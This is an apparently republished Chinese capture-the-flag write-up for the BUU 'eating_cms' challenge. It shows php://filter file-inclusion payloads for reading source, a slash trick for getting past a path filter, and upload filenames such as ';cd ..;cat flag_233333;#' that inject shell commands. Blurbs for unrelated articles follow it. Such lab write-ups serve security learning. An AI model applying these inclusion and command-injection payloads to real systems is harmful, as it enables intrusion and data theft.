BUU eating_cms

2024-04-20 08:58
文章标签 cms buu eating

本文主要是介绍BUU eating_cms,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一个可爱的猫猫登陆界面,日常扫目录抓包看代码
在这里插入图片描述
尝试注入被waf了
在这里插入图片描述
发现一个注册后台,老老实实注册
register.php
登进去是个跟猫猫无关好像有一些功能点但是抓包什么也看不出的页面而且似曾相识感觉在哪里见到过。
略加思索
看看url感觉可以进行文件包含
php伪协议指南
先看看当前的页面
/user.php?page=php://filter/convert.base64-encode/resource=user

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");Header("Location: user.php?page=guest");}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

好像没什么有用的东西(页面进行base64解码查看源码),在function.php看看
/user.php?page=php://filter/convert.base64-encode/resource=function

在这里插入图片描述
发现被限制访问了,可以在url中多加几个斜杆绕过,然后依次读取ffffflllllllaaaaaggg和m4aaannngggeee.php

<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}
include "templates/upload.html";?>

给出一个文件上传地址,访问后上传
在这里插入图片描述
上传失败,直接访问upllloadddd.php
在这里插入图片描述
可以看到文件名直接拼接在命令中,那么可以通过文件名来控制指令
问题来了,正确的上传路径是什么呢
找了很久,未果。。。qmq
(看了别人的wp后)
/user.php?page=m4aaannngggeee
处为真正的上传点
抓包,改文件名为
;ls;#;
列出所有目录
在这里插入图片描述
发现没有flag,去上一级看看
;cd …;ls;#
在这里插入图片描述
catflag
;cd …;cat flag_233333;#
在这里插入图片描述

这篇关于BUU eating_cms的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/919821

相关文章

SEO之网站结构优化(十五-CMS系统)

初创企业搭建网站的朋友看1号文章;想学习云计算,怎么入门看2号文章谢谢支持: 1、我给不会敲代码又想搭建网站的人建议 2、“新手上云”能够为你开启探索云世界的第一步 博客:阿幸SEO~探索搜索排名之道 15、CMS系统 现在的网站绝大多数是通过CMS系统制作和管理的,SEO人员优化网站就会受限于CMS 系统本身的灵活性和功能。市面上有很多开源免费的CMS系统,如中文的dede(织梦)、

sickos 靶机渗透(wolf cms 渗透,squid 代理)

靶机信息 vulnhub靶机 主机发现 192.168.50.152 为靶机Ip ┌──(kali㉿kali)-[~/testSickos]└─$ sudo nmap -sn 192.168.50.0/24[sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:56 C

垃圾收集器知识点总结-CMS

使用回收算法:标记清除 适用区域:老年代 回收过程: 1.初始化标记: 标记Root可达的对象。对于是否把年轻带作为root的这个问题,有不同答案,但是看到了代码里初始化标记的时候做了如下操作 初始化标记会执行到上述代码,然后第二个变量是true(可能对代码的理解有偏差) 2.并发标记: 标记新生代活的对象为Root;沿着Root标记存活的对象;在与程序运行期间,对象引用关系会变化,

【PyQt6 应用程序】CMS自动上稿12数据库综合版

在数字化时代,内容管理系统(CMS)的优化配置成为提高工作效率的关键步骤。CMS能够简化内容的创建、管理和发布过程,但对于初学者或是非技术人员来说,CMS的各项功能和操作可能显得复杂难懂。 使用本软件可以在配置好的数据中基于LM Studio进行批量文章撰写实现SEO。在原有单模板的基础之上增加了多站点管理,管理站点高达12个,实现了一套配置挂机无忧的工作环境。 单篇的操作效果可以参考文章:

垃圾回收器——CMS收集器

CMS[Concurrent Mark Sweep]收集器是一种以获取最短回收停顿时间为目标的收集器。  目前很大一部分的Java应用集中在互联网站或者B/S系统的服务端上,这类应用尤其重视服务的相应速度. 从名字就可以看出,CMS收集器是使用的标记清除算法,它的运作过程相当于前面几种收集器来说更为复杂,整个过程分为四个步骤: 初始标记,标记一下GC Roots能直接关联到的对象,速度很快

CMS收集器配置

HotSpot JVM的并发标记清理收集器(CMS收集器)的主要目标就是:低应用停顿时间。该目标对于大多数交互式应用很重要,比如web应用。在我们看一下有关JVM的参数之前,让我们简要回顾CMS收集器的操作和使用它时可能出现的主要挑战。 就像吞吐量收集器(参见本系列的第6部分),CMS收集器处理老年代的对象,然而其操作要复杂得多。吞吐量收集器总是暂停应用程序线程,并且可能是相当长的一段时间,

uni-CMS:全端开源内容管理系统的技术探索

摘要 本文介绍了uni-CMS,一个基于uniCloud开发的开源内容管理系统(CMS)。该系统旨在帮助开发者快速搭建并管理内容丰富的网站、小程序和移动应用。通过其全端渲染、内容安全检测、广告解锁付费内容以及AI生成文章等特性,uni-CMS不仅提高了开发效率,还促进了内容生产效率的提升和变现能力的增强。本文详细探讨了uni-CMS的技术架构、功能特性以及实施步骤,为开发者提供了一个全面的技术参

比较Freemaker和Nuxt.js作为CMS模板语言的特点

在开发内容管理系统(CMS)时,选择合适的模板语言至关重要。本文将讨论Freemarker和Nuxt.js这两种常用模板语言的特点,以帮助开发者选择最适合其项目需求的工具。 Freemarker的特点 Freemarker是一个基于Java的模板引擎,常用于Java Web应用开发中。以下是Freemarker的主要特点: 1. 易于集成 Freemarker作为Java生态系统的一部分,

易优cms远程调试

易优cms自ThinkPHP5.0版本开始,提供了Socket日志驱动用于本地和远程调试。 Socket调试 只需要在配置文件中设置如下: ‘log’ => [ ‘type’ => ‘socket’, ‘host’ => ‘slog.thinkphp.cn’, //日志强制记录到配置的client_id ‘force_client_ids’ => [], //限制允许读取日志的cl

前后端分离的后台管理系统源码,快速开发OA、CMS网站后台管理、毕业设计项目

那有没有一款软件解-决这种现状呢?答案是肯定的。引入我们的软件——eladmin。 介绍 ELADMIN,一个简单且易上手的 Spring boot 后台管理框架,已发布 Mybatis-Plus 版本,为开发者提供了一个全-面、高-效的解-决方案。 特点 高-效率:前后端完全分离,项目简单可配,内置代码生成器,一键生成前后端代码。 易用性:几乎可用于所有 Web 项目